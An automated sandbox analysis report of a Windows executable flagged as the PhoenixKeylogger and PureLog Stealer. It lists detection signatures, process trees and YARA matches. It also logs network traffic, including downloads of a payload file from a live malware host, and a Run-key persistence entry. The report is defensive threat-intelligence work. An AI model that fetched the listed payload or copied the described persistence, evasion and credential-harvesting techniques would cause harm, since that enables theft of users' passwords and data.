Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6Ek4nfs2y1.exe

Overview

General Information

Sample name:6Ek4nfs2y1.exe
renamed because original name is a hash value
Original sample name:c2d87b5b3c906a6725f420ee3e5cb28a81bcc756b1935d6875578bbc73978687.exe
Analysis ID:1467001
MD5:21ccb2cd9a4fbc259ab1110bc687b960
SHA1:10d68517383a76dd23e172c1f02a74cadf104b34
SHA256:c2d87b5b3c906a6725f420ee3e5cb28a81bcc756b1935d6875578bbc73978687
Tags:exe
Infos:

Detection

PhoenixKeylogger, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PhoenixKeylogger
Yara detected PureLog Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 6Ek4nfs2y1.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\6Ek4nfs2y1.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)
    • 6Ek4nfs2y1.exe (PID: 7912 cmdline: "C:\Users\user\Desktop\6Ek4nfs2y1.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)
  • Qulzerug.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Roaming\Qulzerug.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)
    • Qulzerug.exe (PID: 7536 cmdline: "C:\Users\user\AppData\Roaming\Qulzerug.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)
  • Qulzerug.exe (PID: 1816 cmdline: "C:\Users\user\AppData\Roaming\Qulzerug.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)
    • Qulzerug.exe (PID: 1384 cmdline: "C:\Users\user\AppData\Roaming\Qulzerug.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhoenixKeyloggerYara detected PhoenixKeyloggerJoe Security
    00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_PhoenixPhoenix/404KeyLogger keylogger payloadditekSHen
    • 0x18e9c:$m2: - Clipboard -------|
    • 0x19150:$m3: - Logs -------|
    • 0x19541:$m4: - Passwords -------|
    • 0x19579:$m5: PSWD
    • 0x1917e:$m7: Logs |
    00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhoenixKeyloggerYara detected PhoenixKeyloggerJoe Security
      00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_PhoenixPhoenix/404KeyLogger keylogger payloadditekSHen
      • 0x192f0:$m2: - Clipboard -------|
      • 0x195a4:$m3: - Logs -------|
      • 0x19995:$m4: - Passwords -------|
      • 0x199cd:$m5: PSWD
      • 0x195d2:$m7: Logs |
      0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhoenixKeyloggerYara detected PhoenixKeyloggerJoe Security
        Click to see the 66 entries
        SourceRuleDescriptionAuthorStrings
        0.2.6Ek4nfs2y1.exe.5860000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          9.2.Qulzerug.exe.4a24a70.4.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.6Ek4nfs2y1.exe.6a9e080.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              11.2.Qulzerug.exe.644f058.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                9.2.Qulzerug.exe.2e59a88.2.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  Click to see the 64 entries

                  System Summary

                  barindex
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Qulzerug.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6Ek4nfs2y1.exe, ProcessId: 7364, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qulzerug
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeReversingLabs: Detection: 70%
                  Source: 6Ek4nfs2y1.exeReversingLabs: Detection: 70%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeJoe Sandbox ML: detected
                  Source: 6Ek4nfs2y1.exeJoe Sandbox ML: detected
                  Source: 6Ek4nfs2y1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49711 version: TLS 1.2
                  Source: 6Ek4nfs2y1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.0000000002A98000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.0000000002A98000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp

                  Networking

                  barindex
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 34.117.118.44 34.117.118.44
                  Source: Joe Sandbox ViewIP Address: 34.117.118.44 34.117.118.44
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: ifconfig.me
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: nexoproducciones.cl
                  Source: global trafficDNS traffic detected: DNS query: ifconfig.me
                  Source: 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000341B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.me
                  Source: 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.me/ip
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000341B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nexoproducciones.cl
                  Source: 6Ek4nfs2y1.exe, Qulzerug.exe.0.drString found in binary or memory: https://nexoproducciones.cl/Qlnxkam.dat
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nexoproducciones.cl/Qlnxkam.datt
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000029E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49711 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7912, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR

                  System Summary

                  barindex
                  Source: 12.2.Qulzerug.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
